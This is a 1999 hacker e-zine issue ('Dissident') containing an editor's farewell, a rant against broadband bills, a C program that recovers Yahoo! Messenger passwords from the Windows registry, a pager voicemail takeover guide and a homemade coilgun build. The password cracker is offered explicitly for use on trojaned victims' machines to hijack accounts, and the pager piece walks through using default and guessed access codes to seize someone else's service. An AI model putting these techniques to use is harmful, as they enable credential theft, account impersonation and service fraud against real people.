a penguin palace publication [lineshift studios] $$$$$$$$$ $d:::::::::b#$$ ....werd.... ,F$::::::::::::::m$$$ ...::d#############b. .%@::::::;``:::::::::$###$..:::##################n, t::::::V'`#$#`$::::::####$.:::r######'^``^\#######. `;$::::$##$$##q:::::p###$$..:::####:`'.:..:`:#####: Y::::$##$$##`$::::####$$..:::####:::':..:::#####: $::::p###$$##$::::####$$..:::####$:::..:..:#####: $::::###$$$##@::::###$$$..:::####$:::..:::&#####: $::::b##$$$##$::::###$$$..:::####&:::..:::*#####: $::::&##$$$##&::::###$$$..:::####$:::..:::*#####: $::::$##$$$##$::::###$$$..:::####$:::..:::&#####: ..fjear...$::::@##$$$#!:::::::###$.:::####:b;:::..::$#####: f:::::Q##$$$##q:::::::##$.::#######::::..:$#####.' t:::::y##$$$###o:::::::::########$:':::..::$#####$ d!:::!b##$$$$###'Q:::::::#######%!`:::...:: $#####: `:$:$%' ^~^~~~^^~~~^~^~' @$$!b; $:|:; q$&P #$"' { Dissident } `q; | [08/99] : . , ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³ Disclaimer ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ "Congress shall make no law respecting an establishment of religion, or ³ ³ prohibitting the free excercise thereof; or abbridging the freedom of ³ ³ speech or of the press; or of the right of the people peaceably to ³ ³ assemble, and to petition the Goverment for a redress of grievances" ³ ³ ³ ³ Under the above Law set forth in the First Amendment To The Constution ³ ³ Of The United States Of America, The Author releases this work into the ³ ³ pubic domain for INFORMATIONAL PURPOSES ONLY. ³ ³ ³ ³ Some of the things mentioned in this issue may be illegal/immoral/dumb. ³ ³ So don't do anything or something. If you do something that you read ³ ³ in this 'zine, and you get caught/hurt/maimed/killed/pissed off/raped, ³ ³ it isn't our fault. We're not responsible for your stupidity. ³ ³ ³ ³ Any similarities to persons living, dead, or living now but soon to be ³ ³ dead are totally intentional and are included with extreme malice and ³ ³ prejudice! We bloody hate you! ³ ³ ³ ³ Dissident is written for educational purposes only. Kids, don't try ³ ³ this at home. This publication is protected by international copyright ³ ³ law. (c) 1999 Penguin Palace ³ ³ ³ ³ ³ ³ With that said, we're not fucking responsible. Fnord. ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³ Staff and Friends of DPP ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ Staff: ³ ³ ³ Editor-In-Cheif: Hatredonalog [hoal@penguinpalace.com] ³ ³ Co-Editor: Pinguino [pinguino@penguinpalace.com] ³ ³ Co-Editor: Secret Squirrel [ssq@penguinpalace.com] ³ ³ Head Writer: MMX_Killa [mmx@unibiz.net] ³ ³ ³ Staff Writer: Widge [nanlokd@yahoo.com] ³ ³ Staff Writer :: The ThinkTank [thinktank@penguinpalace.com] ³ ³ Staff Writer :: weev [weev@penguinpalace.com] ³ ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³ Table of Contents ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ ³ ³ Introduction.......................................................hoal ³ ³ Kill Virginia Congressmen..........................................weev ³ ³ Cracking Yahoo! Messenger Passwords...............................Widge ³ ³ TELUS Mobility; Panasonic EN-POWR Pager Exploit...............The Clone ³ ³ Coilguns!..........................................................hoal ³ ³ Defcon VII review. blurred edition...............................zhixel ³ ³ LASERs - Theory and Safty...............................Secret Squirrel ³ ³ LASER Spirograph........................................Secret Squirrel ³ ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Introduction Hoal [hatredonalog@hotmail.com] Ok, This is the last issue of Dissident. I don't know if someone else will continue it, but others have shown interest in taking my place, and they are welcome to. What is this about you ask? Well, i'm resigning. I have come to a point that I am unable to do this anymore. First, school is coming up again, and I can't really spend the time to Solicite for articles constantly, fight with the other staff members, Proof-Read, Edit, and have to fix weev's articles every month. However, i am not completely out of the scene, as i am taking a position as a staff writer at the Phone Punx Magazine (http://fly.to/ppn) which seems to be more of what i've been looking for. Hasta. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Kill Virginia Congressmen weev [auer@vaix.net] I'm sad to say, but the congressman from Virginia, my state, are pushing bills that will degrade internet quality. These bills are extremely likely to become law. The government says it doesn't pick winners, it just monitors business actions, but in the end, the congressmen sitting on their money laundering asses in Washington are filling their pockets at the expense of the overall quality of the internet. The FCC has been extremely cautious in defining the bandwidth limits of the word "broadband". They started the definition at 200kbits/sec. Now, bandwidth demand has pushed that definition up to a few megabits per second. It really has been perfectly defined by user needs. But Bob Goodlatte(r), and Rick Boucher(d), are pushing two new bills, HR 1685, the "Internet Growth and Development Act of 1999," and HR 1686, the "Internet Freedom Act", will redefine the FCC's carefully planned definition of broadband. For once, I'm with the FCC. What this will do is take the definition of broadband back down to 200kbits/sec. And that's actually worse than the original definition. The FCC's old standard was 200kbits/sec dual stream, up and downstream. This definition only requires that one channel be above 200kbits/sec. That means your friendly local telco can force in some asymmetric HDSL stuff that's 200kbits a second upstream, but the speed of a 9600 modem downstream, and call it broadband. And, oh yes, once they make the bill law, that will solidify that definition, and nothing can change it back except the implementation of a new law. This makes me sick. The government is giving a monopoly to DSL providers, like GTE and USWest, and cursing alternatives. The bill will take years to change if it becomes law. DSL will probably need to be replaced by fiber in five years anyway. So bribing two Virginia congressman is their way of ensuring victory for DSL, and being able to push second rate crap on people, and not have to install a new network of fiber, which saves the telcos a couple billion. Let's run through Boucher's description of the bill: "Telephone companies will be required to file plans with state public service commissions for the deployment of DSL services in all local exchanges where the deployment is both technologically feasible and economically reasonable. Today, only 50,000 subscribers nationwide have DSL service. Our legislation will result in those numbers increasing dramatically.... We also seek to encourage competition in the provision of DSL services by reducing the regulatory burden of DSL for telephone companies which agree to make reconditioned loops for the provision of DSL services available in a timely fashion with competitors." Sadly, this description is quite true. Here's what's going to happen. They aren't going to make any more backbones. There won't be any more economic incentive to, since they've got the government keeping the FCC of their backs. They're going to trick thousands of small communities into wasting their tax money on this brand new shiny broadband, and then not give it to them, because it's going to be a one channel 200kbit/sec speed and then the other side is going to be as slow as a fucking 28.8 modem. Any new backbones they need to keep themselves from overloading, or dropping below the required 200kbit/sec limit are going to be 40% vdsl. And they're going to divide it into clusters, having a bunch of VDSL networks chained together. Server-to-server load time will explode. And for all you IRC kiddies, networks will be split into clusters because of the load times. What can YOU do to stop this from happening? Write your local congressman. If you're near DC, you can attempt to get a speaking spot at the hearing of the bills, like I am. If you can think of any other ways to do it, then carry them out. Whatever you can do, keep these bills from becoming law. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Cracking Yahoo! Messenger Passwords Widge [nanlokd@yahoo.com] (introduction) For some reason or another, instant messaging has become very popular recently, with the likes of AOL, Microsoft, and Yahoo! releasing all of their own crappy versions. There is, of course, a lot of arguing over the messaging protocols right now, but that is not important. All we care about is that Yahoo! has a fairly simple passwording scheme to crack. So simple, that any common man (or woman) who walks upright, could easily crack it in his or her head. But for the sake of the people who don't care to use their brain every once in a while, I have coded a neat little ( actually it is big and clumsy - just look at the code ) program that will crack a Yahoo! Messenger password that you throw at it. (the scheme) When some loser signs on to Yahoo! Messenger and toggles the "remember password" box, an encrypted value is stored in the registry. Just go to HKEY_CURRENT_USER/Software/Yahoo/Messenger/YahooPassword! and you will see it. When a password is stored in the registry, it is broken up into chunks of three characters which are then encrypted into four character chunks. So, if "abcdefgh" is our password, it would be broken down into "abc", "def", and "gh" which would then be encrypted. In the registry, it would look like this, "YWJjZGVmZ2h=". YWJj == abc, ZGVm == def, and Z2h == gh. A single character will look like this "Yw==" in the registry. Don't worry about the equal signs, they are just padding. The first two characters of an encrypted chunk correspond to the first cleartext character, the third encrypted to the second clear, and the fourth encrypted to the third clear. The encryption algorithm (if it can be called that) contains nothing mathematical. It is at best, a semi-complex puzzle. Anyway, if you really care to figure out just how this encryption is implemented, look at the source code. But, you'll have to know C to understand it. But I'm not guaranteeing that you will be able to understand my code, bear in mind, I am not a very good programmer. (what the hell is it good for?) To most people, probably nothing. But maybe to those types that use Back Orifice or NetBus or whatever else is out there, you just might find a use for this. Say for instance, you "hax0red" your way onto some computer using some stupid Trojan horse. If they have yahoo! messenger, you can open up their registry and steal their username and password. Using yahoo! messenger, I believe you can read their e-mail or you can just be 'l33t and masquerade as them. But, if that is too juvenile for you, you can check out their stock portfolios and take advantage of our bull market. Regardless of how you use it, you're being a little bastard. (compiling and running) To compile the code, simply type: gcc yahoo.c or use whatever damn compiler you have got. It should compile on just about everything as long as it is ANSI compliant. However, when I tried to compile it on Microsoft Developer Studio Standard (ver 4.0) and Borland Turbo C (1988 version I believe - might be 2.something), it didn't quite compile. But you will be safe if you use gcc, just don't use any Microsoft or Borland products. To run the program, type: a.out where is obviously an encrypted password, and a.out is whatever the program name is. Here is a sample run of the program included here to take up space: hackme:~% a.out YWJjZGVmZ2hpamtsbW5v abcdefghijklmno Now let's look at what happens when this runs. First, it will take the first block of four characters, "YWJj". "YWJj" is an encrypted "abc". "YW", will go through first and put "YQ" in fst[]. de_f() will then be called which will look for "YQ" in one of the f_* arrays. When (if) it finds "YQ", it will display the cleartext. Then "J" goes through second(). Here, "J" is turned into "I" and the program looks through s_letter[]. If it finds a match, it displays the cleartext. Finally, "j" goes through third(). All it does is go through the l_* arrays looking for a match. If it finds one, it displays the cleartext. This process repeats until the decryption is finished. (disclaimer) I really do not care how you use this program. If you want to steal my code and put your name on it, feel free to do so, I don't even care anymore. /* yahoo.c - coded sometime at the end of july and into august a bit coded by widge - nanlokd@yahoo.com - please note that all of these variable names are fucked up and the code could be written much more clearly, i apologize to anyone trying to read the code */ #include #include /* f_lcase contains encrypted characters for the first lowercase character of a password */ char *f_lcase[] = { "YQ", "Yg", "Yw", "ZA", "ZQ", "Zg", "Zw", "aA", "aQ", "ag", "aw", "bA", "bQ", "bg", "bw", "cA", "cQ", "cg", "cw", "dA", "dQ", "dg", "dw", "eA", "eQ", "eg" }; /* f_ucase contains encrypted characters for the first uppercase character of a password */ char *f_ucase[] = { "QQ", "Qg", "Qw", "RA", "RQ", "Rg", "Rw", "SA", "SQ", "Sg", "Sw", "TA", "TQ", "Tg", "Tw", "UA", "UQ", "Ug", "Uw", "VA", "VQ", "Vg", "Vw", "WA", "WQ", "Wg" }; /* f_num contains encrypted characters for the first numeral of a password */ char *f_num[] = { "MA", "MQ", "Mg", "Mw", "NA", "NQ", "Ng", "Nw", "OA", "OQ" }; /* s_letter contains the encrypted characters for the second character of a password */ char s_letter[] = "AEIMQUYcgkows048AEIMQUYcgko"; /* l_lcase contains the encrypted characters for the third lowercase character of a password */ char l_lcase[] = "hijklmnopqrstuvwxyz012345"; /* l_ucase contains the encrypted characters for the third uppercase character of a password */ char l_ucase[] = "BCDEFGHIJKLMNOPQRSTUVWXYZ"; /* l_num contains the encrypted characters for the third numeral of a password */ char l_num[] = "wxyz012345"; /* crypt is the encrypted password, l_al is the lowercase letters of the english alphabet, u_al is the lowercase letters of the english alphabet, fst holds the characters for the first character of a chunk, mov holds how much spaces were moved( explained later ), len is the length of the password, sec holds the second character of the password, ctl does something, so do x and y, ck is explained later. */ char *crypt, l_al[26], u_al[26], fst[2]; int mov, len, sec, ctl, x, y, ck = 0, num[10]; void first( void ); /* fills up fst[] to be decrypted */ void f_de( void ); /* decrypted fst[] to get the first character */ void second( void ); /* decrypts the second character */ void third( void ); /* decrypts the third character */ main(int argc, char **argv) { if( argc < 2 ) { printf("Usage: %s \n", argv[0]); exit(1); } /* pretty obvious */ crypt = (char *)malloc(sizeof(argv[1])); strcpy(crypt, argv[1]); len = strlen(crypt); /* filling up the alphabet and numerals */ for(y = 0, ctl = 97; ctl < 123; ctl++) l_al[y++] = ctl; for(y = 0, ctl = 65; ctl < 91; ctl++) u_al[y++] = ctl; for(ctl = 0; ctl < 10; ctl++) num[ctl] = ctl; /* this is for passwords that are into neat little chunks. that is, when you look in the registry, there will be no equal signs */ if( len % 4 == 0 ) { for(x = 1; x < len; x += 4) { first(); second(); third(); } printf("\n"); } /* this is for passwords with two equal signs */ if( len % 4 == 2 ) { for(x = 1; x < len - 1; x += 4) { first(); second(); third(); } x = len - 1; /* we can't just call first() because it is stored differently when it is single. it will be stored as it appears in the f_* arrays */ fst[0] = crypt[len-2]; fst[1] = crypt[len-1]; f_de(); printf("\n"); } /* and one equal sign */ if( len % 4 == 3 ) { for(x = 1; x < len - 2; x += 4) { first(); second(); third(); } first(); second(); printf("\n"); } } void first( void ) { int b = 0, pos = 7; bzero(fst, sizeof(fst)); /* this takes care of numerals. for instance, if we have b2, we have to take it back towards the lowercase end of the alphabet. so we add an amount to take it to 'z' on the ascii chart. */ if( isdigit(crypt[x]) ) switch( crypt[x] ) { case '0': { crypt[x] += 74; b = 1; break; } case '1': { crypt[x] += 73; b = 2; break; } case '2': { crypt[x] += 72; b = 3; break; } case '3': { crypt[x] += 71; b = 4; break; } } /* this sees how much we have to move our character backwards to get to an 'A', 'Q', 'g', or 'w'. if you look at the f_* arrays of characters, you will see that they all end in one of those letters. we need to know how much mov is for the second character */ for(mov = pos; mov > 2; mov--) { switch(crypt[x] - mov) { case 'A': { fst[1] = 'A'; break; } case 'Q': { fst[1] = 'Q'; break; } case 'g': { fst[1] = 'g'; break; } case 'w': { fst[1] = 'w'; break; } default: continue; } if( fst[1] ) break; } /* looking back up to the numerals, we add b to mov so we know how much we moved back a numeral */ if( b ) mov += b; fst[0] = crypt[x-1]; f_de(); } void f_de( void ) { int a; /* this big, ugly switch statement figures out the cleartext character. Y,Z,z,b,c,d, and e are for lowercase, Q,R,S,T,U,V, and W are for uppercase, and M,N, and O are for numerals. you can see that in the variable declarations. i had to make it a big switch statement, because any other way would make everything go crazy. */ switch( fst[0] ) { case 'Y': case 'Z': case 'a': case 'b': case 'c': case 'd': case 'e': { for(a = 0; a < 27; a++) if( (strcmp(fst, f_lcase[a])) == 0) printf("%c", l_al[a]); break; } case 'Q': case 'R': case 'S': case 'T': case 'U': case 'V': case 'W': { for(a = 0; a < 27; a++) if( (strcmp(fst, f_ucase[a])) == 0 ) printf("%c", u_al[a]); break; } case 'M': case 'N': case 'O': { for(a = 0; a < 10; a++) if( (strcmp(fst, f_num[a])) == 0 ) printf("%d", num[a]); break; } default: break; } bzero(fst, sizeof(fst)); } void second( void ) { int b; sec = 0, ck = 0; /* if we moved back 4 or 6 spaces, we only want to look at the first 17 characters. what we do is take the encrypted character and move it down one letter, and compare it to the characters in s_letter[]. if it matches, we take the b from the for loop and subtract it one or two and make that number sec. from this we just plop it in a_* or num and get our cleartext character */ if( mov == 4 || mov == 6 ) { for(b = 0; b < 17; b++) if( crypt[x+1] - 1 == s_letter[b] ) { /* this thing is just fucked up */ if( b > 10 && b < 13 ) sec = b - 2; else sec = b - 1; } /* this is used if the third character is a numeral or for some other odd occasions */ if( !sec ) for(b = 0; b < 17; b++) if( crypt[x+1] == s_letter[b] ) { if( b > 10 && b < 13 ) sec = b; else sec = b - 1; ck = 1; } } /* if we moved back 5 or 7 spaces, we only want to look at the last characters from 17 up. the same crap applies here as did above */ if( mov == 5 || mov == 7 ) { for(b = 17; b < sizeof(s_letter); b++) if( crypt[x+1] - 1 == s_letter[b] ) sec = b - 1; if( !sec ) for(b = 17; b < sizeof(s_letter); b++) if( crypt[x+1] == s_letter[b] ) { ck = 1; sec = b - 1; } } /* if we moved back 3 spaces, it is a numeral */ if( mov == 3 ) { for(b = 0; b < 10; b++) { if( crypt[x+1] - 1 == s_letter[b] ) { sec = b; printf("%d", num[sec]); } } if( !sec ) for(b = 0; b < 10; b++) if( crypt[x+1] == s_letter[b] ) { ck = 1; sec = b; printf("%d", num[sec]); } } /* if we moved back over 5 spaces, we have a lowercase character */ if( mov > 5 ) printf("%c", l_al[sec]); /* if we moved back 4 or 5 spaces, we have an uppercase character */ if( mov == 4 || mov == 5 ) printf("%c", u_al[sec]); } void third( void ) { int b; /* here, we are taking the last encrypted character and comparing it with the l_* arrays without mucking around with anything. i think this section is pretty self explanatory */ if( !ck ) { for(b = 0; b < 27; b++) { if( crypt[x+2] == l_lcase[b] ) { printf("%c", l_al[b]); return; } if( crypt[x+2] == l_ucase[b] ) { printf("%c", u_al[b]); return; } } } /* this is for numbers or other odd things */ if( ck ) { for(b = 0; b < 10; b++) if( crypt[x+2] == l_num[b] ) { printf("%d", num[b]); return; } for(b = 0; b < 27; b++) { if( crypt[x+2] == l_lcase[b] ) { printf("%c", l_al[b]); return; } if( crypt[x+2] == l_ucase[b] ) { printf("%c", u_al[b]); return; } } } } ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ TELUS Mobility; Panasonic EN-POWR numeric pager exploit The Clone [theclone@edmc.net] Telus Mobility offers to its customers, few types of paging services. One type is called 'EN-POWR numeric pager'. With the EN-POWR numeric pager, you get total FLEX coverage. In other words, you get coverage all across Alberta. The Panasonic EN-POWR pre-paid numeric pager is only $99.95, and it comes with 6 months of enhanced service with a limited but nifty selection of assorted colors to choose from. "But Clone, I have three kids to feed. I can't afford this type of service!" It's completely understandable. That is why I wrote this file. To show you how to get service that *should* be dirt cheap for absolutely free. Lets say that one day you were walking down the street minding your own business, picking flowers, waving to Telus employees as they drive past in their goodie-vans, when you trip over a pager that has the word 'Panasonic' labeled on the top. This semi-transparent device, with its groovy design is the only thing stopping you from suing Telus for leaving its property laying around. Then you remember that it's an EN-POWR pre-paid numeric pager and it has to be property of someone. "Hmm..." you think. At this point you can do one of two things; you can call Telus reporting a missing pager, or you can try to use your wits to find a way to exploit this. First lets take a look at the pager features: Pager features -------------- · saves 23 messages · message time stamp · built in alarm clock · silent vibration or audible alert · low battery alert · shows date and time of day · selective erase/erase all · locks important messages · uses only one AAA battery · FLEX technology gives you up to four months battery life · duplicate message indicator · reminder alert · back-lit display · automatic on/off 'Saves 23 messages', thought of anything yet? ;) Sure you have my analytical friend. Along with numeric paging option, you also get a voice-mail paging option which requires you to dial the number the pager is subscribed to. So you think "How am I going to get this pager number?" ------------------------------------------ One easy way is to wait for someone to page you. Usually friends of the pager customer, don't know the pager is in the wrong hands so they unknowingly send them a voice-message. Bad idea. The minute they send that message, the data is sent to the Telus Mobility switch, and straight to the pager itself. What is displayed? The pager number, silly! (note: if a numeric page is sent, the numbers displayed on the screen are whatever the person who sent it typed.) The next step is easy, you call the number. The next thing you'll hear is one of two things; 1. the customers message, 2. Telus' default message. By simply pressing '0' on the keypad, you'll next be prompted by an automated voice saying: "Please enter your access code". "How do I acquire the access code?" -------------------------------- If the customer was stupid enough to set the default access code, all you do is look on the back of the EN-POWR numeric pager, and search for the "capcode". The capcode is the series of numbers at the bottom of the label, below the Model, Serial Number, Country Code, and ISC code. It's easily distinguishable by the letter E and a 7 digit code after it. An example of a capcode is 'E1230948'. The default access code is the last 4 digits of the capcode. 0948 would be the access code for this pager. Now enter 0948. If you're lucky you'll get the main menu. My suggestion to you is to change the access code as soon as possible. If you're not so lucky, try guessing defaults. 1234, 1111, 1999, 2000, etc. Until you come across the correct access code. If you're still having trouble, try selling the pager to some moronic 14 year old who just wants to look cool in front of his sleazy 14 year old girlfriends'. Final words ----------- Now that I've given you step by step instructions on how to exploit the EN-POWR pre-paid pager, I hope that you've learned a little bit about how it works. In the next few months I can see the news talking about hundreds/thousands of Telus pagers going missing and then used for the thieves' evil purposes. I'll sleep well at night knowing I was the one responsible. THE END written by: The Clone June 22, 1999 `Contact info ---- E-mail: theclone@edmc.net URL: Nettwerked - http://nettwerk.hypermart.net Voice Mail: So-Soft Corporation - 1-800-494-9831; box 407 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Coilguns! hoal [hatredonalog@hotmail.com] "A Coilgun is a tube surrounded by Super conducting electromagnetic coils. It can be used to launch (SHOCK HARDENED CARGO) to LEO at extremely high accelerations. Coilguns with barrel lengths of less than 1,000 miles are impractical for live or fragile cargo due to accelerations of extreme magnitude (100s-1,000s of times the force of earth normal gravity)." - The Electro-Magnetic Propulsion Homepage; http://www.sover.net/~geoffk/railgun.html Ok.. well, this article won't cover building anything that fantastic or large or powerful. It will go over the ideas behind an EMP device, and how to possibly build one (which I am currently in the process thereof.) Part One: Barrel Ok, the barrel is THE most important part of the device itself. You have many choices when it comes to this part: How many coils, how many turns per coil, barrel length, materials, etc. Now, how many coils is your gun going to use... I would go with three. The first 3-4 coils provide the most acceleration, the rest are slightly incremental afterwards, although that does not mean that they don't help. Consider this: YOU are going to have to wrap these coils by hand, so you may want to keep the number of coils down. So, you'll want 4-5 coils in total, which may still be a bit of work, but not a big deal. How many turns should you make it? The more the better, but there is a limit at which the resistance will be too high, and the wires will melt after one shot. A quick fix for this is using thicker wire, and/or try to use Class H wire which can sustain up to 365F. Check out http://www.wiretron.com/magnet.html to figure out what wire is the right one for your application. The higher the amount of current that is going to be flowing through the coils, the higher class of insulation you need. Ok, now that you spent the time reading all of that buy the highest rated stuff you can at your local electronics distributor. Make some nice fat coils, but read on to find out how fat to make them. The EMP homepage recommends that the barrel be evacuated, or made into a complete vacuum. Ok, so that's not too realistic... scratch it. You won't be getting enough acceleration to make air drag a REAL problem. One source says to use a regular barrel, with a .258in. bore with 18in. for length. Now, remember, 18 inches is 1 1/2 feet, so the coils will want to be mounted at the rear. 18 in. barrel. xxx xxx xxxx xxx xxx xxxx ---------------------------------------------- * ---------------------------------------------- xxx xxx xxxx xxx xxx xxxx Ok, now you have the barrel designed, and there is one more thing you may want to think of: External Metal. By Sliding the barrel with the coils around it into an iron pipe, you can add to the magnetic flux, and thus more power. Figure out the diameter of the inside of the iron pipe, and that's how fat your coils should be. The accompanied action is to add iron to the ends (not covering the barrel end.) The only problem with this is that it could cause your coils to overheat and melt. ||==============================================|| ||xxx xxx xxxx xxx xxx xxxx || ||----------------------------------------------|| || * ||----------------------------------------------|| ||xxx xxx xxxx xxx xxx xxxx || ||==============================================|| Ok, That is it for the barrel design.. you should have an idea of how to play with it a bit. Use the one that is within your price range and/or capabilities. A schematic for such things is available at: http://www.geocities.com/Heartland/Prairie/7745/Images/JPEG/RailGunCoils.jpg Part Three: Power Source Next, your going to need a power supply of some sort. Here are some rough specifications for what you need.. it's got to be high voltage, high amperage, and quick. How will you accomplish that? The First way would be to have a timer circuit (you'll need one anyway.) You'll need something that won't melt your coils, and will provide the most power. You'll need to know what ohm your coils are rated at, along with the maximum voltage of any other components that are on that side of the electronics. Now, you should figure out how many AMPS you'll be consuming by firing one coil.. this is found by using ohm's law. I = V/R : Output Amperage = Voltage Supplied/Coil Resistance. After that, you'll have to know how often you'll be need a pulse to fire a coil, and so on. Some good specs on power supplies for this job can be found at http://www.oz.net/~jjhansen/coilgun/mark1/powersupply.htm Another way to power your Coilgun, would be to use a fantastically dangerous capacitor bank that could kill you, your family, and most of your neighborhood's wildlife in one good shock. Anyway, to say the least, you'll need to use higher AWG wire for it, so the coils won't melt, but the plus side is, you can make the projectile shoot, a HELL OF A LOT FASTER. To do this, you would probably need to use a wall socket, which carries about 115vAC. 115 is not a good number, so you'll probably need to lower it down to a reasonable voltage using a variac, and then raise it up with a transformer of some sort. Throw a Bridge rectifier in to filter out the AC (wouldn't be good for your Capacitor bank.) Follow the bridge rectifier with a resistor of appropriate value, and your set. Oh, it should all be put in a serial fashion, as so: ----|variac|---|trans-|---| bridge |---|cap.|----|coil ----| |---|former|---|rectifier|---|bank|-\ -|gun resistor-^ switch-^ That should get you all fuzzy, and supply you with a bit of juice, but you should probably keep it low (around 30-40v) as you may need several pulses. Timing: You will need a 555 timer to get a base time for another crucial part, the coil timer, which will is configured to fire each coil at a specified time (each projectile will need to be similar in size/weight.) You'll also need a coil driver, mostly to protect the rest of your equipment. Such designs and ideas can be found at: http://www.oz.net/~jjhansen/coilgun/mark1/oscillator.htm http://www.oz.net/~jjhansen/coilgun/mark1/coiltimer.htm http://www.oz.net/~jjhansen/coilgun/mark1/coildriver.htm http://www.oz.net/~jjhansen/coilgun/mark1/coiltimer.htm http://www.geocities.com/Heartland/Prairie/7745/Images/JPEG/RailGunMainCircuit.jpg This is all for open-loop design, which expects the projectile to be the same every time (no detection,) as it fires each coil at a specified time whether their is a projectile near or not. http://www.oz.net/~jjhansen/coilgun/mark1/spread1.htm http://www.oz.net/~jjhansen/coilgun/mark1/spread2.htm http://www.oz.net/~jjhansen/coilgun/mark1/spread3.htm Conclusion: They're big. They're bad. They're expensive. They are really cool. They can be dangerous, expensive and take a lot of time to make, but the upside is, you can make them look like large penii. Heh, but if you made a large enough one, with good aiming, you may be able to annihilate small animals in your backyard with high speed drywall screws. Oh, the endless possibilities. Anyway, here, at the end is all the links mentioned in the article again, for good measures, along with a few others. http://www.sover.net/~geoffk/railgun.html http://www.geocities.com/Heartland/Prairie/7745/Images/JPEG/RailGunCoils.jpg http://www.oz.net/~jjhansen/coilgun/mark1/powersupply.htm http://www.oz.net/~jjhansen/coilgun/mark1/oscillator.htm http://www.oz.net/~jjhansen/coilgun/mark1/coiltimer.htm http://www.oz.net/~jjhansen/coilgun/mark1/coildriver.htm 